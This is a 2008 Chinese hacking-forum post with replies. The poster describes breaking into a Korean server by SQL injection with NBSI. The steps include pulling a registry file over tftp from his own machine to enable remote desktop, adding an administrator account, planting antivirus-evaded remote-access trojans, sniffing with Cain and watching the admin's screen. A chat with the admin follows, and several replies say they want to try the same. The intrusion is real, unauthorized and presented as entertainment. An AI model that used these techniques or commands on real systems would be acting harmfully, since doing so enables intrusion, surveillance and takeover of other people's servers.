今天有些无聊..想找一些国外的站来玩.于是用啊D配合google批量扫国外网站的注入点.找到一个访问量不错的SA权限的注入点的韩国站.在nbsi里用oacreat执行命令有回显..呵呵..于是我想用ftp给它下个pcshare马..没想到没有反应..后来就在本地运行tftpd32.exe在NBSI里运行tftp -i 我的IP get 3389.reg上传成功.再导入注册表.regedit /s 3389.reg.然后用netstat -an看了一下3389成功.开了 TCP    0.0.0.0:1723           0.0.0.0:0              LISTENING
TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
TCP    0.0.0.0:3690           0.0.0.0:0              LISTENING
添加个admi520的管理员..成功登陆3389...我又在上面用tftp来下pcshare没想到刚过去就被nod32给杀了...去职业欠钱的网盘里下了cain.结果下载完毕后发才发现以经有cain装好了..于是打开..看看里面..嗅到一些东东但没什么可以利用的..看来早有高手来过了..我去了我的网盘admi520.ys168.com下载以前的N多免杀过的.鸽子..结果只有一只没被杀..不过也好..上线了..显示的是日本的IP..我在远程桌在那边想看一下iis里有哪些网站.,.结果只允许管理员才能查看iis.于是我又下建立隐藏用户工具..也被杀了...郁闷..这时我用鸽子监控它的屏幕..发现机子管理员处于活动状态..但屏幕半天没动.我马上开始操控玩弄..先是看到一个txt文件.打开后没发现什么..又发现一张照片.打开看了下还以为是管理员...过了会再打开它的iis管理器.想找网站..结果看不懂日文..靠感觉点错了.好像.点中了磁盘管理了..这窗口突然被关了..然后就看到有人操作:打开了记事本..打了一句日文(也可能是韩文)反正我看不懂..没管他..一会他又连续打了同样的字.还加了些问号.我还是看不懂..过了会我想起来可以用英文聊..于是我打了用english给他聊了会.我骗他说我是美国人.聊了会他可能看出来了.说我肯定不是美国人...他打了句英语..意思是说我有语法错误..哎..都怪平时不努力学英语呀...后来他问我是怎么进去的..还问是不是很容易登陆进他们的网络..我也没给他说啥,,只是打了个sql injection .do you know..他说no...后来我抓了张NBSI的图.用鸽子传到他桌面上去.打开...他也许看到了些什么东东..但不是很清楚.还问我是怎么知道密码的..我说有这个就不用密码就可以进去..他看到了我的IP.因为我在里面执行了netstat -an..里面有我的IP..他问那个是不是我的IP..我说:是.你想干嘛...他说just...还打了些什么..我没看懂..我打开桌他面上的照片.问是不是他本人..他说不是.那是他高中同学..问他是不是日本人.他也说不是..问了两次他才说是韩国人..我说嘛..怎么是.kr的网站呢..后来我说我马上要退出登陆..于是注消了远程桌面.关闭了鸽子屏幕监控..但我还是想看他在做什么..于是马上又屏幕监控..发现他在netstat -an.我晕..于是我马上就把鸽子给关了....呵呵..觉得这次挺有意思的..所以就写出来了...
相关图片:请见我的百度空间（http://hi.baidu.com/admi520）

kr.GIF (37.82 KB)

2008-5-1 21:00

krgif.GIF (25.56 KB)

2008-5-1 21:00

俺是小菜一个。。还请大家多多指教。。

呵呵，跟老外聊没试过，跟国内开私服的聊倒是试过

如果是MM网管可以要MSN视频呀！

下面是全部内容。。本人英文不好。。哎。。

穿备?穿备?穿备?穿备?穿备?(晕。这里怎么变成了这个？)
hi

what's your name
i'm from usa
are you a japanese?
no;


where are you from?/
can you tell me


Hello..

I am a host for this com..

why did you connect this computer??

it's kind of illigal...
i come here just for a look

anyway, you don't have any purpose don't you?

yes

i will logout

i think you are not American..

you have poor grammar...
yes so did i


are you a japanese?/
no.. it's korea..

by the way, May I ask some question??
yes


is it easy to conncect this network??

how did you register it??
sql injection
do you know?nono
you are the webmaster of the server?
on

you?
no;
who's this?
senior
at school
o i got it
there are some bugs ...
in our network?? so was it easy to access??
yes..
please wait..
...oh..
how did you get password?
don't need password...
ok...
is you IP address 220.166.198.88?
yes
what do you want to do?
no..just..
so...i'll logout

yes..
thanx
that 's all right

bye



bye

[ 本帖最后由 admi520 于 2008-5-2 08:49 编辑 ]

呵呵，好象蛮好玩的，我现手头上有3只国外的，我也去看看人家有什么反映……

呵呵 `有意思``，。。。。。我也去试试。

第一行的韩文意思是问:谁?谁?谁....

呵呵，很有有意思啊~~~

好玩啊，啊哈哈 ................

什么是您的名字从美国的i'm
are您日本人？
no;


where您从？/
can您告诉我


Hello。

I上午这位com的一个主人。

why您是否连接了这台计算机？ ？

it有点儿illigal…
i为神色来这里

anyway，您没有任何目的不您？

yes

i将注销

i认为您不美国。

you有恶劣的语法…
yes如此我


are您日本人？/
no.它是韩国。

顺便说一句， 5月我问某一问题？ ？
yes


is它容易对conncect这个网络？ ？

how您是否登记了它？ ？
sql射入您知道的do ？nono
you Web站点管理员服务器？
on

you ？
no;
who是这？
senior
at学校
o我得到了它
there是有些臭虫…
in我们的网络？ ？ 如此访问？是否是容易的？
yes。
please等待。
…哦。
how您是否得到了密码？
do不是需要密码…
ok…
is您IP地址220.166.198.88 ？
yes
what您是否想要做？
no.just。
so…我将注销

yes。
thanx
that是顺利

bye



bye